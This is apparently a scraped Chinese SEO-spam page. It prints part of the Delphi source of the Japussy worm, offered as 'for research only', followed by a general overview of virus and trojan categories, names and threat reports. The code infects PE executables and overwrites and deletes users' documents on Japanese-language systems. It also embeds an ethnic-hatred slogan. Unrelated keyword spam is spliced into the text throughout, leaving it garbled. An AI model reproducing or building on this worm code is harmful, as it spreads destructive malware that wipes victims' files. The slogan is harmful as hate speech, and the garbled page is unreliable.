【aspnetcore项目源码】【给赞源码】【dnf 源码辅助】upx -d源码

来源:java白菜源码

1.谁有熊猫烧香的源码程序?
2.电脑病毒危害哪些?

upx -d源码

谁有熊猫烧香的程序?

       熊猫烧香核心源码 (一部分)

       熊猫烧香 - 核心源码 Delphi版本

       --------------------------------------------------------------------------------

       仅供研究使用!后果自行负责

       代码:--------------------------------------------------------------------------------

       program Japussy;

       uses

       Windows, SysUtils, Classes, Graphics, ShellAPI{ , Registry};

       const

       HeaderSize = ; //病毒体的大小

       IconOffset = $EB8; //PE文件主图标的偏移量

       //在我的Delphi5 SP1上面编译得到的大小,其它版本的源码Delphi可能不同

       //查找的十六进制字符串可以找到主图标的偏移量

       {

       HeaderSize = ; //Upx压缩过病毒体的大小

       IconOffset = $BC; //Upx压缩过PE文件主图标的偏移量

       //Upx 1.W 用法: upx -9 -- Japussy.exe

       }

       IconSize = $2E8; //PE文件主图标的大小--字节

       IconTail = IconOffset + IconSize; //PE文件主图标的尾部

       ID = $; //感染标记

       //垃圾码,以备写入

       Catchword = 'If a race need to be killed out,源码 it must be Yamato. ' +

       'If a country need to be destroyed, it must be Japan! ' +

       '*** W.Japussy.Worm.A ***';

       { $R *.RES}

       function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer;

       stdcall; external 'Kernel.dll'; //函数声明

       var

       TmpFile: string;

       Si: STARTUPINFO;

       Pi: PROCESS_INFORMATION;

       IsJap: Boolean = False; //日文操作系统标记

       { 判断是否为Win9x }

       function IsWin9x: Boolean;

       var

       Ver: TOSVersionInfo;

       begin

       Result := False;

       Ver.dwOSVersionInfoSize := SizeOf(TOSVersionInfo);

       if not GetVersionEx(Ver) then

       Exit;

       if (Ver.dwPlatformID = VER_PLATFORM_WIN_WINDOWS) then //Win9x

       Result := True;

       end;

       { 发带毒邮件 }

       procedure SendMail;

       begin

       //哪位仁兄愿意完成之?

       end;

       { 感染PE文件 }

       procedure InfectOneFile(FileName: string);

       var

       HdrStream, SrcStream: TFileStream;

       IcoStream, DstStream: TMemoryStream;

       iID: LongInt;

       aIcon: TIcon;

       Infected, IsPE: Boolean;

       i: Integer;

       Buf: array[0..1] of Char;

       begin

       try //出错则文件正在被使用,退出

       if CompareText(FileName,源码 'JAPUSSY.EXE') = 0 then //是自己则不感染

       Exit;

       Infected := False;

       IsPE := False;

       SrcStream := TFileStream.Create(FileName, fmOpenRead);

       try

       for i := 0 to $ do //检查PE文件头

       begin

       SrcStream.Seek(i, soFromBeginning);

       SrcStream.Read(Buf, 2);

       if (Buf[0] = #) and (Buf[1] = #) then //PE标记

       begin

       IsPE := True; //是PE文件

       Break;

       end;

       end;

       SrcStream.Seek(-4, soFromEnd); //检查感染标记

       SrcStream.Read(iID, 4);

       if (iID = ID) or (SrcStream.Size < ) then //太小的文件不感染

       Infected := True;

       finally

       SrcStream.Free;

       end;

       if Infected or (not IsPE) then //如果感染过了或不是PE文件则退出

       Exit;

       IcoStream := TMemoryStream.Create;

       DstStream := TMemoryStream.Create;

       try

       aIcon := TIcon.Create;

       try

       //得到被感染文件的主图标(字节),存入流

       aIcon.ReleaseHandle;

       aIcon.Handle := ExtractIcon(HInstance,源码 PChar(FileName), 0);

       aIcon.SaveToStream(IcoStream);

       finally

       aIcon.Free;

       end;

       SrcStream := TFileStream.Create(FileName, fmOpenRead);

       //头文件

       HdrStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone);

       try

       //写入病毒体主图标之前的数据

       CopyStream(HdrStream, 0, DstStream, 0, IconOffset);

       //写入目前程序的主图标

       CopyStream(IcoStream, , DstStream, IconOffset, IconSize);

       //写入病毒体主图标到病毒体尾部之间的数据

       CopyStream(HdrStream, IconTail, DstStream, IconTail, HeaderSize - IconTail);

       //写入宿主程序

       CopyStream(SrcStream, 0, DstStream, HeaderSize, SrcStream.Size);

       //写入已感染的标记

       DstStream.Seek(0, 2);

       iID := $;

       DstStream.Write(iID, 4);

       finally

       HdrStream.Free;

       end;

       finally

       SrcStream.Free;

       IcoStream.Free;

       DstStream.SaveToFile(FileName); //替换宿主文件

       DstStream.Free;

       end;

       except;

       end;

       end;

       { 将目标文件写入垃圾码后删除 }

       procedure SmashFile(FileName: string);

       var

       FileHandle: Integer;

       i, Size, Mass, Max, Len: Integer;

       begin

       try

       SetFileAttributes(PChar(FileName), 0); //去掉只读属性

       FileHandle := FileOpen(FileName, fmOpenWrite); //打开文件

       try

       Size := GetFileSize(FileHandle, nil); //文件大小

       i := 0;

       Randomize;

       Max := Random(); //写入垃圾码的随机次数

       if Max < 5 then

       Max := 5;

       Mass := Size div Max; //每个间隔块的大小

       Len := Length(Catchword);

       while i < Max do

       begin

       FileSeek(FileHandle, i * Mass, 0); //定位

       //写入垃圾码,将文件彻底破坏掉

       FileWrite(FileHandle,源码aspnetcore项目源码 Catchword, Len);

       Inc(i);

       end;

       finally

       FileClose(FileHandle); //关闭文件

       end;

       DeleteFile(PChar(FileName)); //删除之

       except

       end;

       end;

       { 获得可写的驱动器列表 }

       function GetDrives: string;

       var

       DiskType: Word;

       D: Char;

       Str: string;

       i: Integer;

       begin

       for i := 0 to do //遍历个字母

       begin

       D := Chr(i + );

       Str := D + ':';

       DiskType := GetDriveType(PChar(Str));

       //得到本地磁盘和网络盘

       if (DiskType = DRIVE_FIXED) or (DiskType = DRIVE_REMOTE) then

       Result := Result + D;

       end;

       end;

       { 遍历目录,感染和摧毁文件 }

       procedure LoopFiles(Path,源码 Mask: string);

       var

       i, Count: Integer;

       Fn, Ext: string;

       SubDir: TStrings;

       SearchRec: TSearchRec;

       Msg: TMsg;

       function IsValidDir(SearchRec: TSearchRec): Integer;

       begin

       if (SearchRec.Attr <> ) and (SearchRec.Name <> '.') and

       (SearchRec.Name <> '..') then

       Result := 0 //不是目录

       else if (SearchRec.Attr = ) and (SearchRec.Name <> '.') and

       (SearchRec.Name <> '..') then

       Result := 1 //不是根目录

       else Result := 2; //是根目录

       end;

       begin

       if (FindFirst(Path + Mask, faAnyFile, SearchRec) = 0) then

       begin

       repeat

       PeekMessage(Msg, 0, 0, 0, PM_REMOVE); //调整消息队列,避免引起怀疑

       if IsValidDir(SearchRec) = 0 then

       begin

       Fn := Path + SearchRec.Name;

       Ext := UpperCase(ExtractFileExt(Fn));

       if (Ext = '.EXE') or (Ext = '.SCR') then

       begin

       InfectOneFile(Fn); //感染可执行文件

       end

       else if (Ext = '.HTM') or (Ext = '.HTML') or (Ext = '.ASP') then

       begin

       //感染HTML和ASP文件,源码将Base编码后的源码病毒写入

       //感染浏览此网页的所有用户

       //哪位大兄弟愿意完成之?

       end

       else if Ext = '.WAB' then //Outlook地址簿文件

       begin

       //获取Outlook邮件地址

       end

       else if Ext = '.ADC' then //Foxmail地址自动完成文件

       begin

       //获取Foxmail邮件地址

       end

       else if Ext = 'IND' then //Foxmail地址簿文件

       begin

       //获取Foxmail邮件地址

       end

       else

       begin

       if IsJap then //是倭文操作系统

       begin

       if (Ext = '.DOC') or (Ext = '.XLS') or (Ext = '.MDB') or

       (Ext = '.MP3') or (Ext = '.RM') or (Ext = '.RA') or

       (Ext = '.WMA') or (Ext = '.ZIP') or (Ext = '.RAR') or

       (Ext = '.MPEG') or (Ext = '.ASF') or (Ext = '.JPG') or

       (Ext = '.JPEG') or (Ext = '.GIF') or (Ext = '.SWF') or

       (Ext = '.PDF') or (Ext = '.CHM') or (Ext = '.AVI') then

       SmashFile(Fn); //摧毁文件

       end;

       end;

电脑病毒危害哪些?

       大致总结为以下七点:

       一、病毒激发对计算机数据信息的源码直接破坏作用

       二、占用磁盘空间和对信息的源码破坏

       三、抢占系统资源

       四、源码影响计算机运行速度

       五、源码计算机病毒错误与不可预见的源码危害

       六、计算机病毒的源码兼容性对系统运行的影响

       七、计算机病毒给用户造成严重的心理压力

       大部份的病毒都是把电脑程序及数据破坏,导致系统崩溃。还有所谓的“木马”,其实“木马”也是病毒的一种,不过是病毒的一个大的分支,木马病毒大都是以盗窃用户电脑内的银行账号、游戏账号、个人资料等信息为目的,并且还占用大量系统资源,导致系统运行缓慢、打卡程序迟钝、死机、蓝屏等等。

       计算机病毒会感染、传播,但这并不可怕,可怕的是病毒的破坏性。其主要危害有:

       1、给赞源码攻击硬盘主引导扇区、Boot扇区、FAT表、文件目录,使磁盘上的信息丢失。

       2、删除软盘、硬盘或网络上的可执行文件或数据文件,使文件丢失。

       3、占用磁盘空间。

       4、修改或破坏文件中的数据,使内容发生变化。

       5、抢占系统资源,使内存减少。

       6、占用CPU运行时间,使运行效率降低。

       7、对整个磁盘或扇区进行格式化。

       8、破坏计算机主板上BIOS内容,使计算机无法工作。

       9、破坏屏幕正常显示,干扰用户的操作。

       、破坏键盘输入程序,使用户的正常输入出现错误。

       、dnf 源码辅助攻击喇叭,会使计算机的喇叭发出响声。有的病毒作者让病毒演奏旋律优美的世界名曲,在高雅的曲调中去杀戮人们的信息财富。有的病毒作者通过喇叭发出种种声音。

       .干扰打印机,假报警、间断性打印、更换字符

       系统病毒

       系统病毒的前缀为:Win、PE、Win、W、W等。这些病毒的一般共有的特性是可以感染windows操作系统的 *.exe 和 *.dll 文件,并通过这些文件进行传播。如CIH病毒。

       蠕虫病毒

       蠕虫病毒的前缀是:Worm。这种病毒的共有特性是通过网络或者系统漏洞进行传播,很大部分的蠕虫病毒都有向外发送带毒邮件,阻塞网络的特性。比如冲击波(阻塞网络),小邮差(发带毒邮件) 等。

       木马病毒、黑客病毒

       木马病毒其前缀是:Trojan,黑客病毒前缀名一般为 Hack 。木马病毒的共有特性是通过网络或者系统漏洞进入用户的系统并隐藏,然后向外界泄露用户的信息,而黑客病毒则有一个可视的界面,能对用户的电脑进行远程控制。木马、黑客病毒往往是成对出现的,即木马病毒负责侵入用户的swap分销源码电脑,而黑客病毒则会通过该木马病毒来进行控制。现在这两种类型都越来越趋向于整合了。一般的木马如QQ消息尾巴木马 Trojan.QQ ,还有大家可能遇见比较多的针对网络游戏的木马病毒如 Trojan.LMir.PSW. 。这里补充一点,病毒名中有PSW或者什么PWD之类的一般都表示这个病毒有**密码的功能(这些字母一般都为“密码”的英文“password”的缩写)一些黑客程序如:网络枭雄(Hack.Nether.Client)等。

       脚本病毒

       脚本病毒的前缀是:Script。脚本病毒的共有特性是使用脚本语言编写,通过网页进行的传播的病毒,如红色代码(Script.Redlof)。脚本病毒还会有如下前缀:VBS、JS(表明是何种脚本编写的),如欢乐时光(VBS.Happytime)、十四日(Js.Fortnight.c.s)等。

       宏病毒

       其实宏病毒是也是脚本病毒的一种,由于它的特殊性,因此在这里单独算成一类。宏病毒的前缀是:Macro,第二前缀是:Word、Word、Excel、Excel(也许还有别的)其中之一。凡是只感染WORD及以前版本WORD文档的病毒采用Word作为第二前缀,格式是:Macro.Word;凡是只感染WORD以后版本WORD文档的病毒采用Word做为第二前缀,格式是:Macro.Word;凡是只感染EXCEL及以前版本EXCEL文档的病毒采用Excel做为第二前缀,格式是:Macro.Excel;凡是只感染EXCEL以后版本EXCEL文档的病毒采用Excel做为第二前缀,格式是:Macro.Excel,以此类推。该类病毒的共有特性是能感染OFFICE系列文档,然后通过OFFICE通用模板进行传播,如:著名的美丽莎(Macro.Melissa)。

       后门病毒

       后门病毒的08源码3.3前缀是:Backdoor。该类病毒的共有特性是通过网络传播,给系统开后门,给用户电脑带来安全隐患。

       病毒种植程序病毒

       这类病毒的共有特性是运行时会从体内释放出一个或几个新的病毒到系统目录下,由释放出来的新病毒产生破坏。如:冰河播种者(Dropper.BingHe2.2C)、MSN射手(Dropper.Worm.Smibag)等。

       破坏性程序病毒

       破坏性程序病毒的前缀是:Harm。这类病毒的共有特性是本身具有好看的图标来诱惑用户点击,当用户点击这类病毒时,病毒便会直接对用户计算机产生破坏。如:格式化C盘(Harm.formatC.f)、杀手命令(Harm.Command.Killer)等。

       玩笑病毒

       玩笑病毒的前缀是:Joke。也称恶作剧病毒。这类病毒的共有特性是本身具有好看的图标来诱惑用户点击,当用户点击这类病毒时,病毒会做出各种破坏操作来吓唬用户,其实病毒并没有对用户电脑进行任何破坏。如:女鬼(Joke.Girl ghost)病毒。

       捆绑机病毒

       捆绑机病毒的前缀是:Binder。这类病毒的共有特性是病毒作者会使用特定的捆绑程序将病毒与一些应用程序如QQ、IE捆绑起来,表面上看是一个正常的文件,当用户运行这些捆绑病毒时,会表面上运行这些应用程序,然后隐藏运行捆绑在一起的病毒,从而给用户造成危害。如:捆绑QQ(Binder.QQPass.QQBin)、系统杀手(Binder.killsys)等。 以上为比较常见的病毒前缀,有时候我们还会看到一些其他的,但比较少见,这里简单提一下: DoS:会针对某台主机或者服务器进行DoS攻击; Exploit:会自动通过溢出对方或者自己的系统漏洞来传播自身,或者他本身就是一个用于Hacking的溢出工具; HackTool:黑客工具,也许本身并不破坏你的机子,但是会被别人加以利用来用你做替身去破坏别人。 你可以在查出某个病毒以后通过以上所说的方法来初步判断所中病毒的基本情况,达到知己知彼的效果。在杀毒无法自动查杀,打算采用手工方式的时候这些信息会给你很大的帮助

       一 木马的种类:

       1破坏型:惟一的功能就是破坏并且删除文件,可以自动的删除电脑上的DLL、INI、EXE文件

       2、密码发送型:可以找到隐藏密码并把它们发送到指定的信箱。有人喜欢把自己的各种密码以文件的形式存放在计算机中,认为这样方便;还有人喜欢用WINDOWS提供的密码记忆功能,这样就可以不必每次都输入密码了。许多黑客软件可以寻找到这些文件,把它们送到黑客手中。也有些黑客软件长期潜伏,记录操作者的键盘操作,从中寻找有用的密码。

       3、远程访问型:最广泛的是特洛伊马,只需有人运行了服务端程序,如果客户知道了服务端的IP地址,就可以实现远程控制。以下的程序可以实现观察"受害者"正在干什么,当然这个程序完全可以用在正道上的,比如监视学生机的操作。

       4.键盘记录木马

       这种特洛伊木马是非常简单的。它们只做一件事情,就是记录受害者的键盘敲击并且在LOG文件里查找密码。

       5.DoS攻击木马:随着DoS攻击越来越广泛的应用,被用作DoS攻击的木马也越来越流行起来。当你入侵了一台机器,给他种上DoS攻击木马,那么日后这台计算机就成为你DoS攻击的最得力助手了。你控制的肉鸡数量越多,你发动DoS攻击取得成功的机率就越大。所以,这种木马的危害不是体现在被感染计算机上,而是体现在攻击者可以利用它来攻击一台又一台计算机,给网络造成很大的伤害和带来损失。

       6.代理木马:黑客在入侵的同时掩盖自己的足迹,谨防别人发现自己的身份是非常重要的,因此,给被控制的肉鸡种上代理木马,让其变成攻击者发动攻击的跳板就是代理木马最重要的任务。通过代理木马,攻击者可以在匿名的情况下使用Telnet,ICQ,IRC等程序,从而隐蔽自己的踪迹

       7.FTP木马:这种木马可能是最简单和古老的木马了,它的惟一功能就是打开端口,等待用户连接。现在新FTP木马还加上了密码功能,这样,只有攻击者本人才知道正确的密码,从而进人对方计算机。

       8.程序杀手木马:上面的木马功能虽然形形色色,不过到了对方机器上要发挥自己的作用,还要过防木马软件这一关才行。常见的防木马软件有ZoneAlarm,Norton Anti-Virus等。程序杀手木马的功能就是关闭对方机器上运行的这类程序,让其他的木马更好地发挥作用

       9.反弹端口型木马:木马是木马开发者在分析了防火墙的特性后发现:防火墙对于连入的链接往往会进行非常严格的过滤,但是对于连出的链接却疏于防范。于是,与一般的木马相反,反弹端口型木马的服务端 (被控制端)使用主动端口,客户端 (控制端)使用被动端口。木马定时监测控制端的存在,发现控制端上线立即弹出端口主动连结控制端打开的主动端口;为了隐蔽起见,控制端的被动端口一般开在,即使用户使用扫描软件检查自己的端口,发现类似TCP UserIP: ControllerIP:ESTABLISHED的情况,稍微疏忽一点,你就会以为是自己在浏览网页。

       二:病毒类

       1开机磁区病毒

       2档案型病毒

       3巨集病毒

       4其他新种类的病毒

       三:1计算机病毒名称

       冲击波(WORM_MSBlast.A)

       WM_Etkill(宏病毒)

       捣毁者(WM_ TRASHER.D)

       .......等等...........

       2木马病毒

       木马病毒的前缀是:Trojan

       如Q尾巴:Trojan.QQPSW

       网络游戏木马:Trojan.StartPage.FH等

       3脚本病毒

       脚本病毒的前缀是:Script

       如:红色代码Script.Redlof

       4系统病毒

       系统病毒的前缀为:Win、PE、Win、W、W等

       如以前有名的CIH病毒就属于系统病毒

       5宏病毒

       宏病毒的前缀是:Macro,第二前缀有Word、Word、Excel、Excel等

       如以前著名的美丽莎病毒Macro.Melissa。

       6蠕虫病毒

       蠕虫病毒的前缀是:Worm

       大家比较熟悉的这类病毒有冲击波、震荡波等

       7捆绑机病毒

       捆绑机病毒的前缀是:Binder

       如系统杀手Binder.killsys

       8后门病毒

       后门病毒的前缀是:Backdoor

       如爱情后门病毒Worm.Lovgate.a/b/c

       9坏性程序病毒

       破坏性程序病毒的前缀是:Harm

       格式化C盘(Harm.formatC.f)、杀手命令(Harm.Command.Killer)等。

       玩笑病毒

       玩笑病毒的前缀是:Joke

       如:女鬼(Joke.Girlghost)病毒。

       常见木马名称:

       Mbbmanager.exe → 聪明基因

       _.exe → Tryit Mdm.exe → Doly 1.6-1.7

       Aboutagirl.exe → 初恋情人 Microsoft.exe → 传奇密码使者

       Absr.exe → Backdoor.Autoupder Mmc.exe → 尼姆达病毒

       Aplica.exe → 将死者病毒 Mprdll.exe → Bla

       Avconsol.exe → 将死者病毒 Msabel.exe → Cain and Abel

       Avp.exe → 将死者病毒 Msblast.exe → 冲击波病毒

       Avp.exe → 将死者病毒 Mschv.exe → Control

       Avpcc.exe → 将死者病毒 Msgsrv.exe → Coma

       Avpm.exe → 将死者病毒 Msgsvc.exe → 火凤凰

       Avserve.exe → 震荡波病毒 Msgsvr.exe → Acid Shiver

       Bbeagle.exe → 恶鹰蠕虫病毒 Msie5.exe → Canasson

       Brainspy.exe → BrainSpy vBeta Msstart.exe → Backdoor.livup

       Cfiadmin.exe → 将死者病毒 Mstesk.exe → Doly 1.1-1.5

       Cfiaudit.exe → 将死者病毒 Netip.exe → Spirit Beta

       Cfinet.exe → 将死者病毒 Netspy.exe → 网络精灵

       Checkdll.exe → 网络公牛 Notpa.exe → Backdoor

       Cmctl.exe → Back Construction Odbc.exe → Telecommando

       Command.exe → AOL Trojan Pcfwallicon.exe → 将死者病毒

       Diagcfg.exe → 广外女生 Pcx.exe → Xplorer

       Dkbdll.exe → Der Spaeher Pw.exe → 将死者病毒

       Dllclient.exe → Bobo Recycle - Bin.exe → s**tHeap

       Dvldr.exe → 口令病毒 Regscan.exe → 波特后门变种

       Esafe.exe → 将死者病毒 Tftp.exe → 尼姆达病毒

       Expiorer.exe → Acid Battery Thing.exe → Thing

       Feweb.exe → 将死者病毒 User.exe → Schwindler

       Flcss.exe → Funlove病毒 Vp.exe → 将死者病毒

       Frw.exe → 将死者病毒 Vpcc.exe → 将死者病毒

       Icload.exe → 将死者病毒 Vpm.exe → 将死者病毒

       Icloadnt.exe → 将死者病毒 Vsecomr.exe → 将死者病毒

       Icmon.exe → 将死者病毒 Server.exe → Revenger, WinCrash, YAT

       Icsupp.exe → 将死者病毒 Service.exe → Trinoo

       Iexplore.exe → 恶邮差病毒 Setup.exe → 密码病毒或Xanadu

       Rpcsrv.exe → 恶邮差病毒 Sockets.exe → Vampire

       Rundll.exe → SCKISS爱情森林 Something.exe → BladeRunner

       Rundll.exe→ 狩猎者病毒 Spfw.exe → 瑞波变种PX

       Runouce.exe → 中国黑客病毒 Svchost.exe (线程) → 蓝色代码

       Scanrew.exe → 传奇终结者 Sysedit.exe → SCKISS爱情森林

       Scvhost.exe → 安哥病毒 Sy***plor.exe → wCrat

       Server 1. 2.exe → Spirit 1.2fixed Sy***plr.exe → 冰河

       Intel.exe → 传奇叛逆 Syshelp.exe → 恶邮差病毒

       Internet.exe → 传奇幽灵 Sysprot.exe → Satans Back Door

       Internet.exe → 网络神偷 Sysrunt.exe → Ripper

       Kernel.exe → Transmission Scount System.exe → s**tHeap

       Kernel.exe → 坏透了或冰河 System.exe → DeepThroat 1.0

       Kiss.exe → 传奇天使 Systray.exe → DeepThroat 2.0-3.1

       Krn.exe → 求职信病毒 Syswindow.exe → Trojan Cow

       Libupdate.exe → BioNet Task_Bar.exe

       近期高危病毒/木马:

       病毒名称:熊猫烧香

       病毒名称:U盘破坏者

       最新病毒报告:

       病毒名称:Win.Mitglieder.DU

       病毒别名:Email-Worm.Win.Bagle.gi

       发现日期:/2/

       病毒种类:特洛伊木马

       病毒危害等级:★★★★★

       病毒原理及基本特征:

       Win.Mitglieder.DU是一种特洛伊病毒,能够在被感染机器上打开一个后门,并作为一个SOCKS 4/5代理。特洛伊还会定期的连接与感染相关的信息的网站。病毒的主要运行程序大小为,字节。

       感染方式:

       病毒的主体程序运行时,会复制到:

       %System%\wintems.exe

       Mitglieder.DU生成以下注册表,以确保每次系统启动时运行病毒:

       HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\german.exe = "%System%\wintems.exe"

       注:'%System%'是一个可变的路径。病毒通过查询操作系统来决定System文件夹的位置。Windows and NT默认的系统安装路径是C:\Winnt\System; , 和 ME 的是C:\Windows\System; XP 的是C:\Windows\System。

       危害:

       SOCKS Proxy

       Mitglieder.DU在端口打开一个SOCKS 4/5代理。

       病毒名称:“勒索者(Harm.Extortioner.a)”

       病毒危害等级:★★★☆

       依赖系统:WIN9X/NT//XP。

       病毒种类:恶意程序

       病毒原理及基本特征:

       该恶意程序采用E语言编写,运行后会将用户硬盘上除系统盘的各个分区的文件删除,将自身复制到根目录下,试图通过优盘、移动硬盘等移动存储设备传播,并会建立一个名为“警告”的文件。同时该病毒还会弹出内容为:“警告:发现您硬盘内曾使用过盗版了的我公司软件,所以将您部份文件移到锁定了的扇区,若要解锁将文件释放,请电邮liugongs****9@yahoo.com.cn购买相应的软件”的窗口,向用户进行勒索.

       病毒名称:“情人节”(Vbs_Valentin.A)

       病毒种类:脚本类病毒

       发作日期:2月日

       危害程度:病毒主要通过电子邮件和mIRC(Internet 在线聊天系统)进行传播, 并在2月日“情人节”这一天,将受感染的计算机系统中C盘下的文件进行重命名,在其原文件名后增加后缀名“.txt”,并用一串西班牙字符覆盖这些文件的内容,造成计算机系统无法正常使用

       计算机病毒疫情监测周报

       1

       “威金”( Worm_Viking )

       它主要通过网络共享进行传播,会感染计算机系统中所有文件后缀名为.EXE的可执行文件,导致可执行文件无法正常启动运行,这当中也包括计算机系统中防病毒软件,蠕虫变种会终止防病毒软件,进而导致其无法正常工作。其传播速度十分迅速,一旦进入局域网络,很快就会导致整个局域网络瘫痪。它还会在受感染的计算机系统里运行后,会修改系统注册表的自启动项,以使蠕虫随计算机系统启动而自动运行。

       2 “网络天空”变种(Worm_Netsky.D)

       该病毒通过邮件传播,使用UPX压缩。运行后,在%Win dows%目录下生成自身的拷贝,名称为Winlogon.exe。 (其中,%Windows% 是Windows的默认文件夹,通常是 C:\Windows 或 C:\WINNT),病毒使用Word的图标,并在共享文件夹中生成自身拷贝。病毒创建注册表项,使得自身能够在系统启动时自动运行。病毒邮件的发信人、主题、内容和附件都是不固定的。

       3 “高波”(Worm_AgoBot)

       该病毒是常驻内存的蠕虫病毒,利用RPC DCOM 缓冲区溢出漏洞、IIS5/WEBDAV 缓冲区溢出漏洞和RPC Locator 漏洞进行传播,还可通过弱密码攻击远程系统进行主动传播以及利用mIRC软件进行远程控制和传播。病毒运行后,在%System%文件夹下生成自身的拷贝nvchip4.exe。添加注册表项,使得自身能够在系统启动时自动运行。

       4 Worm_Mytob.X

       该病毒是Worm_Mytob变种,并利用自身的SMTP引擎按照邮件地址列表中的邮件地址向外发送病毒邮件。该病毒还可以通过网络的共享文件夹进行搜索并尝试在这些文件夹中产生自身的拷贝文件。还具有后门功能,会使用不同的端口连接到指定的服务器上面,该服务器监听来自远程恶意用户的指令,利用这个指令远程用户可以控制受感染机器。同时,该变种利用一个任意的端口建立一个 FTP服务器,远程用户可以下载或上传文件或是恶意程序

文章所属分类:知识频道,点击进入>>